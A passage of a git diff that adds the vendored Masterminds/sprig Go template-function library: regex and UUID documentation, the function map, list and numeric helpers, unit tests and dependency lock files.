expression in the input string + +``` +regexFind "[a-zA-Z][1-9]" "abcd1234" +``` + +The above produces `d1` + +## regexReplaceAll + +Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement. +Inside string replacement, $ signs are interpreted as in Expand, so for instance $1 represents the text of the first submatch + +``` +regexReplaceAll "a(x*)b" "-ab-axxb-" "${1}W" +``` + +The above produces `-W-xxW-` + +## regexReplaceAllLiteral + +Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement +The replacement string is substituted directly, without using Expand + +``` +regexReplaceAllLiteral "a(x*)b" "-ab-axxb-" "${1}" +``` + +The above produces `-${1}-${1}-` + +## regexSplit + +Slices the input string into substrings separated by the expression and returns a slice of the substrings between those expression matches. The last parameter `n` determines the number of substrings to return, where `-1` means return all matches + +``` +regexSplit "z+" "pizza" -1 +``` + +The above produces `[pi a]` + +## See Also... + +The [Conversion Functions](conversion.html) contain functions for converting +strings. The [String Slice Functions](string_slice.html) contains functions +for working with an array of strings. + diff --git a/vendor/github.com/Masterminds/sprig/docs/uuid.md b/vendor/github.com/Masterminds/sprig/docs/uuid.md new file mode 100644 index 0000000000..1b57a330a9 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/docs/uuid.md @@ -0,0 +1,9 @@ +# UUID Functions + +Sprig can generate UUID v4 universally unique IDs. + +``` +uuidv4 +``` + +The above returns a new UUID of the v4 (randomly generated) type. diff --git a/vendor/github.com/Masterminds/sprig/example_test.go b/vendor/github.com/Masterminds/sprig/example_test.go new file mode 100644 index 0000000000..2d7696bf9e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/example_test.go @@ -0,0 +1,25 @@ +package sprig + +import ( + "fmt" + "os" + "text/template" +) + +func Example() { + // Set up variables and template. + vars := map[string]interface{}{"Name": " John Jacob Jingleheimer Schmidt "} + tpl := `Hello {{.Name | trim | lower}}` + + // Get the Sprig function map. + fmap := TxtFuncMap() + t := template.Must(template.New("test").Funcs(fmap).Parse(tpl)) + + err := t.Execute(os.Stdout, vars) + if err != nil { + fmt.Printf("Error during template execution: %s", err) + return + } + // Output: + // Hello john jacob jingleheimer schmidt +} diff --git a/vendor/github.com/Masterminds/sprig/flow_control_test.go b/vendor/github.com/Masterminds/sprig/flow_control_test.go new file mode 100644 index 0000000000..d4e5ebf03f --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/flow_control_test.go @@ -0,0 +1,16 @@ +package sprig + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestFail(t *testing.T) { + const msg = "This is an error!" + tpl := fmt.Sprintf(`{{fail "%s"}}`, msg) + _, err := runRaw(tpl, nil) + assert.Error(t, err) + assert.Contains(t, err.Error(), msg) +} diff --git a/vendor/github.com/Masterminds/sprig/functions.go b/vendor/github.com/Masterminds/sprig/functions.go new file mode 100644 index 0000000000..f0d1bc12c1 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/functions.go @@ -0,0 +1,281 @@ +package sprig + +import ( + "errors" + "html/template" + "os" + "path" + "strconv" + "strings" + ttemplate "text/template" + "time" + + util "github.com/aokoli/goutils" + "github.com/huandu/xstrings" +) + +// Produce the function map. +// +// Use this to pass the functions into the template engine: +// +// tpl := template.New("foo").Funcs(sprig.FuncMap())) +// +func FuncMap() template.FuncMap { + return HtmlFuncMap() +} + +// HermeticTextFuncMap returns a 'text/template'.FuncMap with only repeatable functions. +func HermeticTxtFuncMap() ttemplate.FuncMap { + r := TxtFuncMap() + for _, name := range nonhermeticFunctions { + delete(r, name) + } + return r +} + +// HermeticHtmlFuncMap returns an 'html/template'.Funcmap with only repeatable functions. +func HermeticHtmlFuncMap() template.FuncMap { + r := HtmlFuncMap() + for _, name := range nonhermeticFunctions { + delete(r, name) + } + return r +} + +// TextFuncMap returns a 'text/template'.FuncMap +func TxtFuncMap() ttemplate.FuncMap { + return ttemplate.FuncMap(GenericFuncMap()) +} + +// HtmlFuncMap returns an 'html/template'.Funcmap +func HtmlFuncMap() template.FuncMap { + return template.FuncMap(GenericFuncMap()) +} + +// GenericFuncMap returns a copy of the basic function map as a map[string]interface{}. +func GenericFuncMap() map[string]interface{} { + gfm := make(map[string]interface{}, len(genericMap)) + for k, v := range genericMap { + gfm[k] = v + } + return gfm +} + +// These functions are not guaranteed to evaluate to the same result for given input, because they +// refer to the environemnt or global state. +var nonhermeticFunctions = []string{ + // Date functions + "date", + "date_in_zone", + "date_modify", + "now", + "htmlDate", + "htmlDateInZone", + "dateInZone", + "dateModify", + + // Strings + "randAlphaNum", + "randAlpha", + "randAscii", + "randNumeric", + "uuidv4", + + // OS + "env", + "expandenv", +} + +var genericMap = map[string]interface{}{ + "hello": func() string { return "Hello!" }, + + // Date functions + "date": date, + "date_in_zone": dateInZone, + "date_modify": dateModify, + "now": func() time.Time { return time.Now() }, + "htmlDate": htmlDate, + "htmlDateInZone": htmlDateInZone, + "dateInZone": dateInZone, + "dateModify": dateModify, + "ago": dateAgo, + "toDate": toDate, + + // Strings + "abbrev": abbrev, + "abbrevboth": abbrevboth, + "trunc": trunc, + "trim": strings.TrimSpace, + "upper": strings.ToUpper, + "lower": strings.ToLower, + "title": strings.Title, + "untitle": untitle, + "substr": substring, + // Switch order so that "foo" | repeat 5 + "repeat": func(count int, str string) string { return strings.Repeat(str, count) }, + // Deprecated: Use trimAll. + "trimall": func(a, b string) string { return strings.Trim(b, a) }, + // Switch order so that "$foo" | trimall "$" + "trimAll": func(a, b string) string { return strings.Trim(b, a) }, + "trimSuffix": func(a, b string) string { return strings.TrimSuffix(b, a) }, + "trimPrefix": func(a, b string) string { return strings.TrimPrefix(b, a) }, + "nospace": util.DeleteWhiteSpace, + "initials": initials, + "randAlphaNum": randAlphaNumeric, + "randAlpha": randAlpha, + "randAscii": randAscii, + "randNumeric": randNumeric, + "swapcase": util.SwapCase, + "shuffle": xstrings.Shuffle, + "snakecase": xstrings.ToSnakeCase, + "camelcase": xstrings.ToCamelCase, + "wrap": func(l int, s string) string { return util.Wrap(s, l) }, + "wrapWith": func(l int, sep, str string) string { return util.WrapCustom(str, l, sep, true) }, + // Switch order so that "foobar" | contains "foo" + "contains": func(substr string, str string) bool { return strings.Contains(str, substr) }, + "hasPrefix": func(substr string, str string) bool { return strings.HasPrefix(str, substr) }, + "hasSuffix": func(substr string, str string) bool { return strings.HasSuffix(str, substr) }, + "quote": quote, + "squote": squote, + "cat": cat, + "indent": indent, + "nindent": nindent, + "replace": replace, + "plural": plural, + "sha1sum": sha1sum, + "sha256sum": sha256sum, + "toString": strval, + + // Wrap Atoi to stop errors. + "atoi": func(a string) int { i, _ := strconv.Atoi(a); return i }, + "int64": toInt64, + "int": toInt, + "float64": toFloat64, + + //"gt": func(a, b int) bool {return a > b}, + //"gte": func(a, b int) bool {return a >= b}, + //"lt": func(a, b int) bool {return a < b}, + //"lte": func(a, b int) bool {return a <= b}, + + // split "/" foo/bar returns map[int]string{0: foo, 1: bar} + "split": split, + "splitList": func(sep, orig string) []string { return strings.Split(orig, sep) }, + "toStrings": strslice, + + "until": until, + "untilStep": untilStep, + + // VERY basic arithmetic. + "add1": func(i interface{}) int64 { return toInt64(i) + 1 }, + "add": func(i ...interface{}) int64 { + var a int64 = 0 + for _, b := range i { + a += toInt64(b) + } + return a + }, + "sub": func(a, b interface{}) int64 { return toInt64(a) - toInt64(b) }, + "div": func(a, b interface{}) int64 { return toInt64(a) / toInt64(b) }, + "mod": func(a, b interface{}) int64 { return toInt64(a) % toInt64(b) }, + "mul": func(a interface{}, v ...interface{}) int64 { + val := toInt64(a) + for _, b := range v { + val = val * toInt64(b) + } + return val + }, + "biggest": max, + "max": max, + "min": min, + "ceil": ceil, + "floor": floor, + "round": round, + + // string slices. Note that we reverse the order b/c that's better + // for template processing. + "join": join, + "sortAlpha": sortAlpha, + + // Defaults + "default": dfault, + "empty": empty, + "coalesce": coalesce, + "compact": compact, + "toJson": toJson, + "toPrettyJson": toPrettyJson, + "ternary": ternary, + + // Reflection + "typeOf": typeOf, + "typeIs": typeIs, + "typeIsLike": typeIsLike, + "kindOf": kindOf, + "kindIs": kindIs, + + // OS: + "env": func(s string) string { return os.Getenv(s) }, + "expandenv": func(s string) string { return os.ExpandEnv(s) }, + + // File Paths: + "base": path.Base, + "dir": path.Dir, + "clean": path.Clean, + "ext": path.Ext, + "isAbs": path.IsAbs, + + // Encoding: + "b64enc": base64encode, + "b64dec": base64decode, + "b32enc": base32encode, + "b32dec": base32decode, + + // Data Structures: + "tuple": list, // FIXME: with the addition of append/prepend these are no longer immutable. + "list": list, + "dict": dict, + "set": set, + "unset": unset, + "hasKey": hasKey, + "pluck": pluck, + "keys": keys, + "pick": pick, + "omit": omit, + "merge": merge, + + "append": push, "push": push, + "prepend": prepend, + "first": first, + "rest": rest, + "last": last, + "initial": initial, + "reverse": reverse, + "uniq": uniq, + "without": without, + "has": has, + + // Crypto: + "genPrivateKey": generatePrivateKey, + "derivePassword": derivePassword, + "buildCustomCert": buildCustomCertificate, + "genCA": generateCertificateAuthority, + "genSelfSignedCert": generateSelfSignedCertificate, + "genSignedCert": generateSignedCertificate, + + // UUIDs: + "uuidv4": uuidv4, + + // SemVer: + "semver": semver, + "semverCompare": semverCompare, + + // Flow Control: + "fail": func(msg string) (string, error) { return "", errors.New(msg) }, + + // Regex + "regexMatch": regexMatch, + "regexFindAll": regexFindAll, + "regexFind": regexFind, + "regexReplaceAll": regexReplaceAll, + "regexReplaceAllLiteral": regexReplaceAllLiteral, + "regexSplit": regexSplit, +} diff --git a/vendor/github.com/Masterminds/sprig/functions_test.go b/vendor/github.com/Masterminds/sprig/functions_test.go new file mode 100644 index 0000000000..edf88a3255 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/functions_test.go @@ -0,0 +1,108 @@ +package sprig + +import ( + "bytes" + "fmt" + "math/rand" + "os" + "testing" + "text/template" + + "github.com/aokoli/goutils" + "github.com/stretchr/testify/assert" +) + +func TestEnv(t *testing.T) { + os.Setenv("FOO", "bar") + tpl := `{{env "FOO"}}` + if err := runt(tpl, "bar"); err != nil { + t.Error(err) + } +} + +func TestExpandEnv(t *testing.T) { + os.Setenv("FOO", "bar") + tpl := `{{expandenv "Hello $FOO"}}` + if err := runt(tpl, "Hello bar"); err != nil { + t.Error(err) + } +} + +func TestBase(t *testing.T) { + assert.NoError(t, runt(`{{ base "foo/bar" }}`, "bar")) +} + +func TestDir(t *testing.T) { + assert.NoError(t, runt(`{{ dir "foo/bar/baz" }}`, "foo/bar")) +} + +func TestIsAbs(t *testing.T) { + assert.NoError(t, runt(`{{ isAbs "/foo" }}`, "true")) + assert.NoError(t, runt(`{{ isAbs "foo" }}`, "false")) +} + +func TestClean(t *testing.T) { + assert.NoError(t, runt(`{{ clean "/foo/../foo/../bar" }}`, "/bar")) +} + +func TestExt(t *testing.T) { + assert.NoError(t, runt(`{{ ext "/foo/bar/baz.txt" }}`, ".txt")) +} + +func TestSnakeCase(t *testing.T) { + assert.NoError(t, runt(`{{ snakecase "FirstName" }}`, "first_name")) + assert.NoError(t, runt(`{{ snakecase "HTTPServer" }}`, "http_server")) + assert.NoError(t, runt(`{{ snakecase "NoHTTPS" }}`, "no_https")) + assert.NoError(t, runt(`{{ snakecase "GO_PATH" }}`, "go_path")) + assert.NoError(t, runt(`{{ snakecase "GO PATH" }}`, "go_path")) + assert.NoError(t, runt(`{{ snakecase "GO-PATH" }}`, "go_path")) +} + +func TestCamelCase(t *testing.T) { + assert.NoError(t, runt(`{{ camelcase "http_server" }}`, "HttpServer")) + assert.NoError(t, runt(`{{ camelcase "_camel_case" }}`, "_CamelCase")) + assert.NoError(t, runt(`{{ camelcase "no_https" }}`, "NoHttps")) + assert.NoError(t, runt(`{{ camelcase "_complex__case_" }}`, "_Complex_Case_")) + assert.NoError(t, runt(`{{ camelcase "all" }}`, "All")) +} + +func TestShuffle(t *testing.T) { + goutils.RANDOM = rand.New(rand.NewSource(1)) + // Because we're using a random number generator, we need these to go in + // a predictable sequence: + assert.NoError(t, runt(`{{ shuffle "Hello World" }}`, "rldo HWlloe")) +} + +// runt runs a template and checks that the output exactly matches the expected string. +func runt(tpl, expect string) error { + return runtv(tpl, expect, map[string]string{}) +} + +// runtv takes a template, and expected return, and values for substitution. +// +// It runs the template and verifies that the output is an exact match. +func runtv(tpl, expect string, vars interface{}) error { + fmap := TxtFuncMap() + t := template.Must(template.New("test").Funcs(fmap).Parse(tpl)) + var b bytes.Buffer + err := t.Execute(&b, vars) + if err != nil { + return err + } + if expect != b.String() { + return fmt.Errorf("Expected '%s', got '%s'", expect, b.String()) + } + return nil +} + +// runRaw runs a template with the given variables and returns the result. +func runRaw(tpl string, vars interface{}) (string, error) { + fmap := TxtFuncMap() + t := template.Must(template.New("test").Funcs(fmap).Parse(tpl)) + var b bytes.Buffer + err := t.Execute(&b, vars) + if err != nil { + return "", err + } + return b.String(), nil +} diff --git a/vendor/github.com/Masterminds/sprig/glide.lock b/vendor/github.com/Masterminds/sprig/glide.lock new file mode 100644 index 0000000000..34afeb9c37 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/glide.lock @@ -0,0 +1,33 @@ +hash: 770b6a1132b743dadf6a0bb5fb8bf7083b1a5209f6d6c07826234ab2a97aade9 +updated: 2018-04-02T23:08:56.947456531+02:00 +imports: +- name: github.com/aokoli/goutils + version: 9c37978a95bd5c709a15883b6242714ea6709e64 +- name: github.com/google/uuid + version: 064e2069ce9c359c118179501254f67d7d37ba24 +- name: github.com/huandu/xstrings + version: 3959339b333561bf62a38b424fd41517c2c90f40 +- name: github.com/imdario/mergo + version: 7fe0c75c13abdee74b09fcacef5ea1c6bba6a874 +- name: github.com/Masterminds/goutils + version: 3391d3790d23d03408670993e957e8f408993c34 +- name: github.com/Masterminds/semver + version: 59c29afe1a994eacb71c833025ca7acf874bb1da +- name: github.com/stretchr/testify + version: e3a8ff8ce36581f87a15341206f205b1da467059 + subpackages: + - assert +- name: golang.org/x/crypto + version: d172538b2cfce0c13cee31e647d0367aa8cd2486 + subpackages: + - pbkdf2 + - scrypt +testImports: +- name: github.com/davecgh/go-spew + version: 5215b55f46b2b919f50a1df0eaa5886afe4e3b3d + subpackages: + - spew +- name: github.com/pmezard/go-difflib + version: d8ed2627bdf02c080bf22230dbb337003b7aba2d + subpackages: + - difflib diff --git a/vendor/github.com/Masterminds/sprig/glide.yaml b/vendor/github.com/Masterminds/sprig/glide.yaml new file mode 100644 index 0000000000..772ba91344 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/glide.yaml @@ -0,0 +1,15 @@ +package: github.com/Masterminds/sprig +import: +- package: github.com/Masterminds/goutils + version: ^1.0.0 +- package: github.com/google/uuid + version: ^0.2 +- package: golang.org/x/crypto + subpackages: + - scrypt +- package: github.com/Masterminds/semver + version: v1.2.2 +- package: github.com/stretchr/testify +- package: github.com/imdario/mergo + version: ~0.2.2 +- package: github.com/huandu/xstrings diff --git a/vendor/github.com/Masterminds/sprig/list.go b/vendor/github.com/Masterminds/sprig/list.go new file mode 100644 index 0000000000..1860549a94 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/list.go @@ -0,0 +1,259 @@ +package sprig + +import ( + "fmt" + "reflect" + "sort" +) + +// Reflection is used in these functions so that slices and arrays of strings, +// ints, and other types not implementing []interface{} can be worked with. +// For example, this is useful if you need to work on the output of regexs. + +func list(v ...interface{}) []interface{} { + return v +} + +func push(list interface{}, v interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + nl := make([]interface{}, l) + for i := 0; i < l; i++ { + nl[i] = l2.Index(i).Interface() + } + + return append(nl, v) + + default: + panic(fmt.Sprintf("Cannot push on type %s", tp)) + } +} + +func prepend(list interface{}, v interface{}) []interface{} { + //return append([]interface{}{v}, list...) + + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + nl := make([]interface{}, l) + for i := 0; i < l; i++ { + nl[i] = l2.Index(i).Interface() + } + + return append([]interface{}{v}, nl...) + + default: + panic(fmt.Sprintf("Cannot prepend on type %s", tp)) + } +} + +func last(list interface{}) interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + return l2.Index(l - 1).Interface() + default: + panic(fmt.Sprintf("Cannot find last on type %s", tp)) + } +} + +func first(list interface{}) interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + return l2.Index(0).Interface() + default: + panic(fmt.Sprintf("Cannot find first on type %s", tp)) + } +} + +func rest(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + nl := make([]interface{}, l-1) + for i := 1; i < l; i++ { + nl[i-1] = l2.Index(i).Interface() + } + + return nl + default: + panic(fmt.Sprintf("Cannot find rest on type %s", tp)) + } +} + +func initial(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + nl := make([]interface{}, l-1) + for i := 0; i < l-1; i++ { + nl[i] = l2.Index(i).Interface() + } + + return nl + default: + panic(fmt.Sprintf("Cannot find initial on type %s", tp)) + } +} + +func sortAlpha(list interface{}) []string { + k := reflect.Indirect(reflect.ValueOf(list)).Kind() + switch k { + case reflect.Slice, reflect.Array: + a := strslice(list) + s := sort.StringSlice(a) + s.Sort() + return s + } + return []string{strval(list)} +} + +func reverse(v interface{}) []interface{} { + tp := reflect.TypeOf(v).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(v) + + l := l2.Len() + // We do not sort in place because the incoming array should not be altered. + nl := make([]interface{}, l) + for i := 0; i < l; i++ { + nl[l-i-1] = l2.Index(i).Interface() + } + + return nl + default: + panic(fmt.Sprintf("Cannot find reverse on type %s", tp)) + } +} + +func compact(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + nl := []interface{}{} + var item interface{} + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if !empty(item) { + nl = append(nl, item) + } + } + + return nl + default: + panic(fmt.Sprintf("Cannot compact on type %s", tp)) + } +} + +func uniq(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + dest := []interface{}{} + var item interface{} + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if !inList(dest, item) { + dest = append(dest, item) + } + } + + return dest + default: + panic(fmt.Sprintf("Cannot find uniq on type %s", tp)) + } +} + +func inList(haystack []interface{}, needle interface{}) bool { + for _, h := range haystack { + if reflect.DeepEqual(needle, h) { + return true + } + } + return false +} + +func without(list interface{}, omit ...interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + res := []interface{}{} + var item interface{} + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if !inList(omit, item) { + res = append(res, item) + } + } + + return res + default: + panic(fmt.Sprintf("Cannot find without on type %s", tp)) + } +} + +func has(needle interface{}, haystack interface{}) bool { + tp := reflect.TypeOf(haystack).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(haystack) + var item interface{} + l := l2.Len() + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if reflect.DeepEqual(needle, item) { + return true + } + } + + return false + default: + panic(fmt.Sprintf("Cannot find has on type %s", tp)) + } +} diff --git a/vendor/github.com/Masterminds/sprig/list_test.go b/vendor/github.com/Masterminds/sprig/list_test.go new file mode 100644 index 0000000000..fa4cc76e57 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/list_test.go @@ -0,0 +1,157 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestTuple(t *testing.T) { + tpl := `{{$t := tuple 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}` + if err := runt(tpl, "foo1a"); err != nil { + t.Error(err) + } +} + +func TestList(t *testing.T) { + tpl := `{{$t := list 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}` + if err := runt(tpl, "foo1a"); err != nil { + t.Error(err) + } +} + +func TestPush(t *testing.T) { + // Named `append` in the function map + tests := map[string]string{ + `{{ $t := tuple 1 2 3 }}{{ append $t 4 | len }}`: "4", + `{{ $t := tuple 1 2 3 4 }}{{ append $t 5 | join "-" }}`: "1-2-3-4-5", + `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ append $t "qux" | join "-" }}`: "foo-bar-baz-qux", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} +func TestPrepend(t *testing.T) { + tests := map[string]string{ + `{{ $t := tuple 1 2 3 }}{{ prepend $t 0 | len }}`: "4", + `{{ $t := tuple 1 2 3 4 }}{{ prepend $t 0 | join "-" }}`: "0-1-2-3-4", + `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ prepend $t "qux" | join "-" }}`: "qux-foo-bar-baz", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestFirst(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | first }}`: "1", + `{{ list | first }}`: "", + `{{ regexSplit "/src/" "foo/src/bar" -1 | first }}`: "foo", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} +func TestLast(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | last }}`: "3", + `{{ list | last }}`: "", + `{{ regexSplit "/src/" "foo/src/bar" -1 | last }}`: "bar", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestInitial(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | initial | len }}`: "2", + `{{ list 1 2 3 | initial | last }}`: "2", + `{{ list 1 2 3 | initial | first }}`: "1", + `{{ list | initial }}`: "[]", + `{{ regexSplit "/" "foo/bar/baz" -1 | initial }}`: "[foo bar]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestRest(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | rest | len }}`: "2", + `{{ list 1 2 3 | rest | last }}`: "3", + `{{ list 1 2 3 | rest | first }}`: "2", + `{{ list | rest }}`: "[]", + `{{ regexSplit "/" "foo/bar/baz" -1 | rest }}`: "[bar baz]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestReverse(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | reverse | first }}`: "3", + `{{ list 1 2 3 | reverse | rest | first }}`: "2", + `{{ list 1 2 3 | reverse | last }}`: "1", + `{{ list 1 2 3 4 | reverse }}`: "[4 3 2 1]", + `{{ list 1 | reverse }}`: "[1]", + `{{ list | reverse }}`: "[]", + `{{ regexSplit "/" "foo/bar/baz" -1 | reverse }}`: "[baz bar foo]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestCompact(t *testing.T) { + tests := map[string]string{ + `{{ list 1 0 "" "hello" | compact }}`: `[1 hello]`, + `{{ list "" "" | compact }}`: `[]`, + `{{ list | compact }}`: `[]`, + `{{ regexSplit "/" "foo//bar" -1 | compact }}`: "[foo bar]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestUniq(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 4 | uniq }}`: `[1 2 3 4]`, + `{{ list "a" "b" "c" "d" | uniq }}`: `[a b c d]`, + `{{ list 1 1 1 1 2 2 2 2 | uniq }}`: `[1 2]`, + `{{ list "foo" 1 1 1 1 "foo" "foo" | uniq }}`: `[foo 1]`, + `{{ list | uniq }}`: `[]`, + `{{ regexSplit "/" "foo/foo/bar" -1 | uniq }}`: "[foo bar]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestWithout(t *testing.T) { + tests := map[string]string{ + `{{ without (list 1 2 3 4) 1 }}`: `[2 3 4]`, + `{{ without (list "a" "b" "c" "d") "a" }}`: `[b c d]`, + `{{ without (list 1 1 1 1 2) 1 }}`: `[2]`, + `{{ without (list) 1 }}`: `[]`, + `{{ without (list 1 2 3) }}`: `[1 2 3]`, + `{{ without list }}`: `[]`, + `{{ without (regexSplit "/" "foo/bar/baz" -1 ) "foo" }}`: "[bar baz]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestHas(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | has 1 }}`: `true`, + `{{ list 1 2 3 | has 4 }}`: `false`, + `{{ regexSplit "/" "foo/bar/baz" -1 | has "bar" }}`: `true`, + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} diff --git a/vendor/github.com/Masterminds/sprig/numeric.go b/vendor/github.com/Masterminds/sprig/numeric.go new file mode 100644 index 0000000000..209c62e53a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/numeric.go @@ -0,0 +1,159 @@ +package sprig + +import ( + "math" + "reflect" + "strconv" +) + +// toFloat64 converts 64-bit floats +func toFloat64(v interface{}) float64 { + if str, ok := v.(string); ok { + iv, err := strconv.ParseFloat(str, 64) + if err != nil { + return 0 + } + return iv + } + + val := reflect.Indirect(reflect.ValueOf(v)) + switch val.Kind() { + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return float64(val.Int()) + case reflect.Uint8, reflect.Uint16, reflect.Uint32: + return float64(val.Uint()) + case reflect.Uint, reflect.Uint64: + return float64(val.Uint()) + case reflect.Float32, reflect.Float64: + return val.Float() + case reflect.Bool: + if val.Bool() == true { + return 1 + } + return 0 + default: + return 0 + } +} + +func toInt(v interface{}) int { + //It's not optimal. Bud I don't want duplicate toInt64 code. + return int(toInt64(v)) +} + +// toInt64 converts integer types to 64-bit integers +func toInt64(v interface{}) int64 { + if str, ok := v.(string); ok { + iv, err := strconv.ParseInt(str, 10, 64) + if err != nil { + return 0 + } + return iv + } + + val := reflect.Indirect(reflect.ValueOf(v)) + switch val.Kind() { + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return val.Int() + case reflect.Uint8, reflect.Uint16, reflect.Uint32: + return int64(val.Uint()) + case reflect.Uint, reflect.Uint64: + tv := val.Uint() + if tv <= math.MaxInt64 { + return int64(tv) + } + // TODO: What is the sensible thing to do here? + return math.MaxInt64 + case reflect.Float32, reflect.Float64: + return int64(val.Float()) + case reflect.Bool: + if val.Bool() == true { + return 1 + } + return 0 + default: + return 0 + } +} + +func max(a interface{}, i ...interface{}) int64 { + aa := toInt64(a) + for _, b := range i { + bb := toInt64(b) + if bb > aa { + aa = bb + } + } + return aa +} + +func min(a interface{}, i ...interface{}) int64 { + aa := toInt64(a) + for _, b := range i { + bb := toInt64(b) + if bb < aa { + aa = bb + } + } + return aa +} + +func until(count int) []int { + step := 1 + if count < 0 { + step = -1 + } + return untilStep(0, count, step) +} + +func untilStep(start, stop, step int) []int { + v := []int{} + + if stop < start { + if step >= 0 { + return v + } + for i := start; i > stop; i += step { + v = append(v, i) + } + return v + } + + if step <= 0 { + return v + } + for i := start; i < stop; i += step { + v = append(v, i) + } + return v +} + +func floor(a interface{}) float64 { + aa := toFloat64(a) + return math.Floor(aa) +} + +func ceil(a interface{}) float64 { + aa := toFloat64(a) + return math.Ceil(aa) +} + +func round(a interface{}, p int, r_opt ...float64) float64 { + roundOn := .5 + if len(r_opt) > 0 { + roundOn = r_opt[0] + } + val := toFloat64(a) + places := toFloat64(p) + + var round float64 + pow := math.Pow(10, places) + digit := pow * val + _, div := math.Modf(digit) + if div >= roundOn { + round = math.Ceil(digit) + } else { + round = math.Floor(digit) + } + return round / pow +} \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/numeric_test.go b/vendor/github.com/Masterminds/sprig/numeric_test.go new file mode 100644 index 0000000000..2f41253052 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/numeric_test.go @@ -0,0 +1,205 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestUntil(t *testing.T) { + tests := map[string]string{ + `{{range $i, $e := until 5}}{{$i}}{{$e}}{{end}}`: "0011223344", + `{{range $i, $e := until -5}}{{$i}}{{$e}} {{end}}`: "00 1-1 2-2 3-3 4-4 ", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} +func TestUntilStep(t *testing.T) { + tests := map[string]string{ + `{{range $i, $e := untilStep 0 5 1}}{{$i}}{{$e}}{{end}}`: "0011223344", + `{{range $i, $e := untilStep 3 6 1}}{{$i}}{{$e}}{{end}}`: "031425", + `{{range $i, $e := untilStep 0 -10 -2}}{{$i}}{{$e}} {{end}}`: "00 1-2 2-4 3-6 4-8 ", + `{{range $i, $e := untilStep 3 0 1}}{{$i}}{{$e}}{{end}}`: "", + `{{range $i, $e := untilStep 3 99 0}}{{$i}}{{$e}}{{end}}`: "", + `{{range $i, $e := untilStep 3 99 -1}}{{$i}}{{$e}}{{end}}`: "", + `{{range $i, $e := untilStep 3 0 0}}{{$i}}{{$e}}{{end}}`: "", + } + for tpl, expect := range tests { + if err := 